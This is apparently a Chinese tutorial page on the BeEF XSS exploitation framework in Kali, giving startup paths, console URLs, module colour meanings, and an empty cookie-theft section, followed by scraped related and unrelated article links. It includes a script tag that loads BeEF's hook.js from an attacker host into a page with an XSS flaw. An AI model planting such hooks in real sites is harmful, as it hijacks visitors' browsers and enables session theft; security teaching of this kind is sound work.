XSS 工具之 beef
目录
beef介绍
beef 的启动
beef 的应用
1)浏览器劫持
2)Cookie 窃取与欺骗 -- 固定会话攻击
beef介绍
XSS 漏洞的利用平台,kali 自带
beef 的启动
Kali 中
工具目录 /usr/share/beef-xss
配置文件 config.yaml
启动 beef 工具的方法
1)beef-xss
2) /usr/share/beef-xss/beef
注:在启动前需要修改默认用户名及密码(config.yaml),否则会启动失败。
Web 界面管理控制台:http://192.168.11.167:3000/ui/panel
Shellcode:http://192.168.11.167:3000/hook.js
测试页面 :http://192.168.11.167:3000/demos/butcher/index.html
beef 的应用
确认有XSS漏洞后可利用网页重定向使其跳转至指定网页
<script src="http://192.168.11.167:3000/hook.js"></script>
1)浏览器劫持
命令模块:绿色模块:表示模块适合目标浏览器,并且执行对客户端不可见橙色模块:表示模块可用,但是对用户可见(CAM弹框申请权限)红色模块:表示模块不适用与当前用户,有些红色模块可以正常执行灰色模块:模块未在目标浏览器上测试过
2)Cookie 窃取与欺骗 -- 固定会话攻击
。。。。。。
XSS 工具之 beef相关推荐
- (28)【xss工具绕过】xss之burpsuite、前端、字典……
目录 burpsuite抓包 方法一:对数据进行模糊测试 方法二:安装插件,进行xss漏洞检测 XSS Validator 前端绕过 X-frame被忽略情况 原理: 取值: 利用: 使用DOM型XS ...
- web安全----xss工具使用3
XSSer 0x01 安装 环境:kali.python3(必须是python3,kali默认为python2) 安装步骤: git clone https://github.com/epsylon/ ...
- 【干货】XSS知识总结
公众号:白帽子左一 XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种.它允许恶意用户将代码注入到网页上,其他 ...
- 怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...
- 一个好玩的工具BeEF介绍
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息.键盘记录.社会工程等 ...
- 网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
- 网络安全中的NISP-SO安全运维工程师都需要那些工具?
网络安全运维工程师的实用工具有那些 1.掌握安全运维所必须的资产梳理工具(Layer.御剑.nmap.dirb.wafw00f) 2.掌握安全运维利器流量抓包工具(Wireshark.burpsuit ...
- 实验三 XSS和SQL注入
实验三 XSS和SQL注入 实验目的:了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQ ...
- XSS学习笔记(未完)
XSS基础学习 1. XSS 1.1 客户端Cookie: 1.2 XSS攻击类型 1.3 工具/平台 1.4 利用方式 1.4.1 非手工方式 1.4.1.1自动化攻击:beef 1.4.2 手工方 ...
- XSS(Cross-site Script,跨站脚本)漏洞笔记
起源 最早的 XSS 漏洞可追溯到 1999 年末,微软安全工程师发现一些网站遭到攻击,网站被插入了一些恶意脚本和图像标签.随后,微软对此类漏洞进行研究分析,并在 2000 年 1 月,正式使用&qu ...
最新文章
- 云计算设计模式(十)——守门员模式
- PE学习(九)第九章:TLS 动态TLS与静态TLS
- 新媒体视频导演 - 美学基础 todo
- 基因共表达聚类分析及可视化
- prototype、JQuery中跳出each循环的方法
- 百度地图离线_3大主流导航地图,你用的哪个?
- [转]使用Android-Studio 开发Android 程序
- POJ2074 Line of Sight
- python常用内置函数
- chrome 插件--B站自动发弹幕
- avcap 跨平台摄像头视频捕捉
- 速读原著-TCP/IP(IP首部)
- 图灵计算机科学丛书•《具体数学中文版》下载
- 题目 1020: 猴子吃桃的问题
- CLR的主要作用有哪些
- 深入理解Android相机体系结构之九
- CICD系列之k8s
- 判断字符串是否存在于文件中
- 复旦大学计算机导师评价与简介
- 【C++ 语言】异常 ( 抛出字符串异常 | 抛出异常对象 | 抛出任意对象 | 抛出自定义异常 )
热门文章
- kafka自动提交offset的设置理解
- Android 获取gateway网关地址
- 【转载】《三体》:给时光以生命,给岁月以文明
- 计算机硬盘空间不都用,搞不懂的磁盘占用100% 自检一遍全解决
- 浅谈打开网页速度慢的原因和解决方法
- The Plant Journal | DAP-seq助力揭示乌龙茶树杂种优势形成的分子机制
- Android第一行代码踩坑qwq
- web页面上联系QQ客服功能实现——一行代码搞定
- gitter 卸载_最佳Gitter渠道:iOS开发人员
- Android 9.0 USER_ROTATION重启后恢复默认值